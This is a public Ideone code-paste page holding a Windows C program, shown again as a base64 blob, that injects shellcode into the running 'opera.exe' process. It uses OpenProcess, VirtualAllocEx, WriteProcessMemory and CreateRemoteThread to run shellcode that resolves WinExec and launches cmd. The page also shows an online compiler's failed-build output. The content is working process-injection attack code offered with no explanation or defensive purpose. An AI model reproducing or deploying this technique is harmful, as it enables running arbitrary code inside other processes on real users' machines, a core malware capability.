Ideone.com

fork download

copy

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
 
unsigned char shellcode[] = "\x8B\xDC"
"\x68\x63\x6D\x64\x20"
"\x8B\xC4"
"\x6A\x01"
"\x50"
"\xB8\x41\x2C\x9A\x77"
"\xFF\xD0"
"\x8B\xE3"
"\x5A";
 
void PrepareShellcode(void)
{
	unsigned long KernelAddr;
	DWORD dwOldProtect;
 
	KernelAddr = (unsigned long)GetModuleHandle(TEXT("Kernel32"));
 
	*(DWORD *)(shellcode + 13) = (DWORD)GetProcAddress((HMODULE)KernelAddr, "WinExec");
}
 
DWORD GetPID(LPTSTR lpProcess)
{
	PROCESSENTRY32 pe32;
	HANDLE snapshot = NULL;
	HANDLE hProcess = NULL;
	DWORD ProcessID = 0;
 
	if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE)
	{
		RtlZeroMemory(&pe32, sizeof(PROCESSENTRY32));
		pe32.dwSize = sizeof(PROCESSENTRY32);
		Process32First(snapshot, &pe32);
		do
		{
			if (lstrcmp(pe32.szExeFile, lpProcess) == 0)
			{
				ProcessID = pe32.th32ProcessID;
				break;
			}
		} while (Process32Next(snapshot, &pe32));
	}
 
	CloseHandle(snapshot);
	return ProcessID;
}
 
void Inject(HANDLE hProcess)
{
	PVOID	pRemoteShellcode = NULL;
	HANDLE	hRemoteThread = NULL;
	DWORD	dwRemoteThreadID = 0;
	DWORD	dwInjectStatus = 0;
 
	PrepareShellcode();
 
	__try
	{
		int size = sizeof(shellcode);
 
		pRemoteShellcode = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		if (pRemoteShellcode == NULL)
		{
			printf("VirtualAllocEx failed. Last error: %x\n", GetLastError());
			__leave;
		}
 
		WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, size, NULL);
 
		hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, &dwRemoteThreadID);
		if (hRemoteThread == NULL)
		{
			printf("CreateRemoteThread failed. Last error: %x\n", GetLastError());
			__leave;
		}
 
		WaitForSingleObject(hRemoteThread, INFINITE);
		GetExitCodeThread(hRemoteThread, &dwInjectStatus);
	}
	__finally
	{
		if (!dwInjectStatus)
		{
			printf("Injection failed\n");
			VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
 
			if (hRemoteThread != NULL)
			{
				CloseHandle(hRemoteThread);
			}
		}
	}
}
 
int main()
{
	DWORD ProcessID;
	HANDLE hProcess;
 
	ProcessID = GetPID(TEXT("opera.exe"));
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
 
	if (hProcess != INVALID_HANDLE_VALUE)
	{
		Inject(hProcess);
		CloseHandle(hProcess);
	}
	return 0;
}

I2luY2x1ZGUgPFdpbmRvd3MuaD4KI2luY2x1ZGUgPFRsSGVscDMyLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9ICJceDhCXHhEQyIKIlx4NjhceDYzXHg2RFx4NjRceDIwIgoiXHg4Qlx4QzQiCiJceDZBXHgwMSIKIlx4NTAiCiJceEI4XHg0MVx4MkNceDlBXHg3NyIKIlx4RkZceEQwIgoiXHg4Qlx4RTMiCiJceDVBIjsKCnZvaWQgUHJlcGFyZVNoZWxsY29kZSh2b2lkKQp7Cgl1bnNpZ25lZCBsb25nIEtlcm5lbEFkZHI7CglEV09SRCBkd09sZFByb3RlY3Q7CgoJS2VybmVsQWRkciA9ICh1bnNpZ25lZCBsb25nKUdldE1vZHVsZUhhbmRsZShURVhUKCJLZXJuZWwzMiIpKTsKCgkqKERXT1JEICopKHNoZWxsY29kZSArIDEzKSA9IChEV09SRClHZXRQcm9jQWRkcmVzcygoSE1PRFVMRSlLZXJuZWxBZGRyLCAiV2luRXhlYyIpOwp9CgpEV09SRCBHZXRQSUQoTFBUU1RSIGxwUHJvY2VzcykKewoJUFJPQ0VTU0VOVFJZMzIgcGUzMjsKCUhBTkRMRSBzbmFwc2hvdCA9IE5VTEw7CglIQU5ETEUgaFByb2Nlc3MgPSBOVUxMOwoJRFdPUkQgUHJvY2Vzc0lEID0gMDsKCglpZiAoKHNuYXBzaG90ID0gQ3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90KFRIMzJDU19TTkFQUFJPQ0VTUywgMCkpICE9IElOVkFMSURfSEFORExFX1ZBTFVFKQoJewoJCVJ0bFplcm9NZW1vcnkoJnBlMzIsIHNpemVvZihQUk9DRVNTRU5UUlkzMikpOwoJCXBlMzIuZHdTaXplID0gc2l6ZW9mKFBST0NFU1NFTlRSWTMyKTsKCQlQcm9jZXNzMzJGaXJzdChzbmFwc2hvdCwgJnBlMzIpOwoJCWRvCgkJewoJCQlpZiAobHN0cmNtcChwZTMyLnN6RXhlRmlsZSwgbHBQcm9jZXNzKSA9PSAwKQoJCQl7CgkJCQlQcm9jZXNzSUQgPSBwZTMyLnRoMzJQcm9jZXNzSUQ7CgkJCQlicmVhazsKCQkJfQoJCX0gd2hpbGUgKFByb2Nlc3MzMk5leHQoc25hcHNob3QsICZwZTMyKSk7Cgl9CgkJCglDbG9zZUhhbmRsZShzbmFwc2hvdCk7CglyZXR1cm4gUHJvY2Vzc0lEOwp9Cgp2b2lkIEluamVjdChIQU5ETEUgaFByb2Nlc3MpCnsKCVBWT0lECXBSZW1vdGVTaGVsbGNvZGUgPSBOVUxMOwoJSEFORExFCWhSZW1vdGVUaHJlYWQgPSBOVUxMOwoJRFdPUkQJZHdSZW1vdGVUaHJlYWRJRCA9IDA7CglEV09SRAlkd0luamVjdFN0YXR1cyA9IDA7CgoJUHJlcGFyZVNoZWxsY29kZSgpOwoJCglfX3RyeQoJewoJCWludCBzaXplID0gc2l6ZW9mKHNoZWxsY29kZSk7CgoJCXBSZW1vdGVTaGVsbGNvZGUgPSBWaXJ0dWFsQWxsb2NFeChoUHJvY2VzcywgTlVMTCwgc2l6ZSwgTUVNX0NPTU1JVCwgUEFHRV9FWEVDVVRFX1JFQURXUklURSk7CgkJaWYgKHBSZW1vdGVTaGVsbGNvZGUgPT0gTlVMTCkKCQl7CgkJCXByaW50ZigiVmlydHVhbEFsbG9jRXggZmFpbGVkLiBMYXN0IGVycm9yOiAleFxuIiwgR2V0TGFzdEVycm9yKCkpOwoJCQlfX2xlYXZlOwoJCX0KCgkJV3JpdGVQcm9jZXNzTWVtb3J5KGhQcm9jZXNzLCBwUmVtb3RlU2hlbGxjb2RlLCBzaGVsbGNvZGUsIHNpemUsIE5VTEwpOwoKCQloUmVtb3RlVGhyZWFkID0gQ3JlYXRlUmVtb3RlVGhyZWFkKGhQcm9jZXNzLCBOVUxMLCAwLCAoTFBUSFJFQURfU1RBUlRfUk9VVElORSlwUmVtb3RlU2hlbGxjb2RlLCBOVUxMLCAwLCAmZHdSZW1vdGVUaHJlYWRJRCk7CgkJaWYgKGhSZW1vdGVUaHJlYWQgPT0gTlVMTCkKCQl7CgkJCXByaW50ZigiQ3JlYXRlUmVtb3RlVGhyZWFkIGZhaWxlZC4gTGFzdCBlcnJvcjogJXhcbiIsIEdldExhc3RFcnJvcigpKTsKCQkJX19sZWF2ZTsKCQl9CgoJCVdhaXRGb3JTaW5nbGVPYmplY3QoaFJlbW90ZVRocmVhZCwgSU5GSU5JVEUpOwoJCUdldEV4aXRDb2RlVGhyZWFkKGhSZW1vdGVUaHJlYWQsICZkd0luamVjdFN0YXR1cyk7Cgl9CglfX2ZpbmFsbHkKCXsKCQlpZiAoIWR3SW5qZWN0U3RhdHVzKQoJCXsKCQkJcHJpbnRmKCJJbmplY3Rpb24gZmFpbGVkXG4iKTsKCQkJVmlydHVhbEZyZWVFeChoUHJvY2VzcywgcFJlbW90ZVNoZWxsY29kZSwgMCwgTUVNX1JFTEVBU0UpOwoKCQkJaWYgKGhSZW1vdGVUaHJlYWQgIT0gTlVMTCkKCQkJewoJCQkJQ2xvc2VIYW5kbGUoaFJlbW90ZVRocmVhZCk7CgkJCX0KCQl9Cgl9Cn0KCmludCBtYWluKCkKewoJRFdPUkQgUHJvY2Vzc0lEOwoJSEFORExFIGhQcm9jZXNzOwoKCVByb2Nlc3NJRCA9IEdldFBJRChURVhUKCJvcGVyYS5leGUiKSk7CgloUHJvY2VzcyA9IE9wZW5Qcm9jZXNzKFBST0NFU1NfQUxMX0FDQ0VTUywgRkFMU0UsIFByb2Nlc3NJRCk7CgoJaWYgKGhQcm9jZXNzICE9IElOVkFMSURfSEFORExFX1ZBTFVFKQoJewoJCUluamVjdChoUHJvY2Vzcyk7CgkJQ2xvc2VIYW5kbGUoaFByb2Nlc3MpOwoJfQoJcmV0dXJuIDA7Cn0=

Compilation error #stdin compilation error #stdout 0s 0KB

stdin

copy

Standard input is empty

compilation info

prog.c:1:21: fatal error: Windows.h: No such file or directory
compilation terminated.

stdout

copy

Standard output is empty

https://ideone.com/4DUG8S

language:

C (gcc 8.3)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language